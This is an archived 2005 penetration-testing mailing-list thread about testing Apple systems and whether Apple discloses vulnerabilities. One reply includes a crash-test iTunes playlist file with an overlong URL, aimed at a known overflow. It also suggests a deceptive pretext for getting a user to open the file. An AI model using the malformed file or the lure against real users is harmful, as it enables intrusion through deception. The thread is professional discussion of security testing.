Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Apple pentesting

from [Daniel] Network Security [Permanent Link]
Subject: Re: Apple pentesting
Date: Wed, 6 Apr 2005 00:35:49 +0100 
I'll answer your questions individually.

First thing to understand is that not all vulnerabilities have a
corresponding "publicly available" exploit, yes the 0hday still
exists.

<<where is the expoit information?>>

As i said before, not all known vulnerabilities have publicly
available exploit code. I'd suggest getting kinky with Metasploit or a
subscription to Canvas/that other one i cant think of right now. If
they are publicly available, those crazy french peeps over at k-otik
may have it (http://www.frsirt.com/english/)

<<What is the vulnerability?>>
if your on the pen-test mailing list, i'm gathering your a sexurity
conslutant and have some idea of where security vulnerabilities are
announced, if not, google/securityfocus.com/apple.com/security &
full-disclosure mailing list.

<<Do exploits exist? >>
oh yes, they do and don't let some vendor tell you otherwise. 

<<Can you test if you are vulnerability?>>

This is the main issue currently splitting the security consultancy
industry in half at the moment, on the one hand you have people who
call themselves "pen-testers" but only are able to rely on automated
tools and scripts to test (therefore should be known as vulnerability
assessment consultants) and then you have consultants who are able to
read a vulnerability statement and have a understanding of how to look
for the issue and perform a test.

Here, very roughly, is how you could test:

find a vulnerability that you know you have the skill set to test for,
hmmm in this case i'll pick the iTunes issue found by those lovely
people at iDefense

http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities

* i'm using this one as an example, yes you need the person to click
and listen to the playlist, but hell social engineering is all part of
the game, so apologies to all that its not a 100% remote issue *

So the issue is that iTunes gets it's knickers in a knot when parsing
playlist files which may contain really long URL file entries. Well
this is a simple classic issue here, well documented and armed with
your copy of the shellcoders handbook, easy to create a test for.

[playlist]
numberofentries=1
File1=http://[P x 3333] 2233 
Length1=-1
Version=2

Save that file and somehow get a person on the box to open it (pretty
easy, tell them your doing a test for the IT department and this is to
check to see if the microphone is enabled, as if it is a virus could
record all office noise)

iTunes will crash and if you took steps to actually exploit this
crash, you may end up with code being executed.


<<Apple doesn't follow Full-Disclourse>>

And i'm 1000% supportive of this process as is
Microsoft/Oracle/Sun/Sybase etc, why should they report detailed
information about the security hole? They list the issue and also if
it was fixed and how to go about fixing it using a supplied patch or
method.

Here's hoping all the questions raised have been answered?

Daniel






On Apr 5, 2005 7:59 PM, Todd Towles <toddtowles@brookshires.com> wrote:

And I ask you where is the expoit information? What is the
vulnerability? Do exploits exist? Can you test if you are vulnerability?
These is a site that list patches..not the same thing.  Interesting that
you think they are the same. Apple doesn't follow Full-Disclourse, that
was my point.

I didn't mean they don't patch...


-----Original Message-----
From: Altheide, Cory B. (IARC) [mailto:AltheideC@nv.doe.gov]
Sent: Tuesday, April 05, 2005 1:55 PM
To: Todd Towles; Julian Totzek; pen-test@securityfocus.com
Subject: RE: Apple pentesting


-----Original Message-----
From: Todd Towles [mailto:toddtowles@brookshires.com]
Sent: Tuesday, April 05, 2005 10:48 AM
To: Julian Totzek; pen-test@securityfocus.com
Subject: RE: Apple pentesting


Nessus does work against Macs, the problem with testing

Macs is they

never released vulnerability statements..never. If a hole is found,
Apple releases a patch and no ones says anything. If Microsoft did
this..everyone would go crazy.


I'm gonna go out on a limb and say you don't know what you're
talking about.

Protip:  Google for 'apple security' and this is the first hit.

http://docs.info.apple.com/article.html?artnum=61798


Cory Altheide
Senior Network Forensics Specialist
NNSA Information Assurance Response Center (IARC)
altheidec@nv.doe.gov "I have taken all knowledge to be my
province." -- Francis Bacon
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  PullThePlug Wargames, announcements
Next by Date:  Re: Samba hacking ?, David Cravshaw
Previous by Thread:  RE: Apple pentesting, Todd Towles
Next by Thread:  RE: Apple pentesting, Altheide, Cory B. (IARC)
Indexes:  [Date] [Thread] [Top] [All Lists]